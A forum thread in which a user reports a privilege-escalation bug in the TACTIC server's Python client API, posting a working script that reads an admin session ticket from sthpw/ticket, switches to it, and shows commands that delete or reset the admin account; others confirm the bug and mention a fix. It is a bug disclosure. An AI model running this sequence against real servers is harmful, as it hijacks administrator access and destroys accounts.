client api: accessing sthpw search types using non admin user

LazyLeopard · (This post was last modified: 11-17-2021, 03:16 PM by LazyLeopard.)

I am playing with the python client api at the moment. I have been able to get this sequence going.

Code:
import tactic_client_lib as tcl

server = tcl.TacticServerStub.get()  # login using non-admin user

server.check_access('project', {'code', 'new_project'}, 'allow')

# False

ticket = server.query('sthpw/ticket', filters=[('login', 'admin')], order_bys=['timestamp desc'], single=True]

server.set_ticket(ticket['ticket'])

server.check_access('project', {'code', 'new_project'}, 'allow')

# True

I am also able to query other `sthpw` search types including `sthpw/file` and `sthpw/snapshot`. All of which pound the db very heavily.

Actually, I can also don't need any special permissions to go ahead and delete the admin user

Code:
server.delete_sobject('sthpw/login?code=admin')

{'__search_key__': 'sthpw/login?code=admin',

 '__search_type__': 'sthpw/login',

 'code': 'admin',

 'data': None,

 'department': None,

 'display_name': ', Admin',

 'email': None,

 'first_name': 'Admin',

 'hourly_wage': None,

 'id': 1,

 'keywords': None,

 'keywords_data': None,

 'last_name': None,

 'license_type': None,

 'location': None,

 'login': 'admin',

 'login_attempt': None,

 'login_groups': None,

 'namespace': None,

 'password': '$S$DCUJSVJNAiQgZrkG8WAGF0U7WkXge5RACaiIPXlQKd0rPZAc8bCg',

 'phone_number': None,

 'project_code': None,

 's_status': None,

 'snapshot': None,

 'upn': 'admin'}

or directly update its password without any problem!

Code:
user = server.get_by_search_key('sthpw/login?code=user')

server.update('sthpw/login?code=admin', {'password': user['password']})

Is this intended behaviour?

What can I do to disable this?

listy · 11-18-2021, 10:10 AM

1. Where are you running this code? From the script editor as admin ?
2. Print current login and ticket using api to make sure

LazyLeopard · 11-18-2021, 04:58 PM

(11-18-2021, 10:10 AM)listy Wrote: 1. Where are you running this code? From the script editor as admin ?
2. Print current login and ticket using api to make sure

I am running this code from a python repl from my host against the docker 4.8.0 image.

I login using the get_ticket + set_ticket sequence.

LazyLeopard · (This post was last modified: 11-19-2021, 05:56 AM by LazyLeopard.)

(11-18-2021, 04:58 PM)LazyLeopard Wrote:
(11-18-2021, 10:10 AM)listy Wrote: 1. Where are you running this code? From the script editor as admin ?
2. Print current login and ticket using api to make sure
I am running this code from a python repl from my host against the docker 4.8.0 image.

I login using the get_ticket + set_ticket sequence.

For your convenience:

test_tactic.py

Code:
#!/usr/bin/env python

# -*- coding: utf-8 -*-

from __future__ import print_function

import tactic_client_lib as tcl

stub = tcl.TacticServerStub.get(setup=False)

stub.set_server('localhost')

ticket = stub.get_ticket('tactic', 'tactic123')

stub.set_ticket(ticket)

print('\nAcquired tactic ticket', ticket)

project_codes = stub.eval("@GET(sthpw/project.code)")

print('Project codes:', project_codes)

print('\nAccess status for tactic:')

print('===========================')

for pc in project_codes:

    access = stub.check_access('project', {'code': pc}, 'allow')

    print('project {pc} is {noaccess}accessible'.format(

        pc=pc, noaccess='' if access else 'NOT '))

ticket = stub.query(

    'sthpw/ticket', filters=[('login', 'admin')], order_bys=['timestamp desc'],

    single=True)

print('\nAcquired ticket {ticket} for {login}!'.format(**ticket))

stub.set_ticket(ticket['ticket'])

print('\nAccess status for {login}:'.format(**ticket))

print('===========================')

for pc in project_codes:

    access = stub.check_access('project', {'code': pc}, 'allow')

    print('project {pc} is {noaccess}accessible'.format(

        pc=pc, noaccess='' if access else 'not '))

Windows CMD

Code:
(venv) D:\talha.ahmed\Workspace>python test_tactic.py

Acquired tactic ticket cbb9ad3e6aeca620192

Project codes: ['admin', 'episodic', 'important_project', 'new_project', 'sthpw']

Access status for tactic:

===========================

project admin is NOT accessible

project episodic is NOT accessible

project important_project is NOT accessible

project new_project is NOT accessible

project sthpw is NOT accessible

Acquired ticket 5cdf6ef2992669e88b2 for admin!

Access status for admin:

===========================

project admin is accessible

project episodic is accessible

project important_project is accessible

project new_project is accessible

project sthpw is accessible

11-22-2021, 10:09 PM

Hi LazyLeopard,
this is bad security bug!

I tracked it to src/pyasm/search/search.py
When api_mode is open (default) there is no check for access to some security critical tables

Could you open an Issue on github reporting the bug? I will make a PR to fix it...

LazyLeopard · 11-23-2021, 05:29 AM

Bug Report Posted:

https://github.com/Southpaw-TACTIC/TACTIC/issues/1694

11-23-2021, 07:03 AM

Thanks LazyLeopard!
I submitted a PR to fix the bug. I will update the docker images whenever Remko merge it.

If you want to test it, it's an easy edit on src/pyasm/search/search.py

Cheers.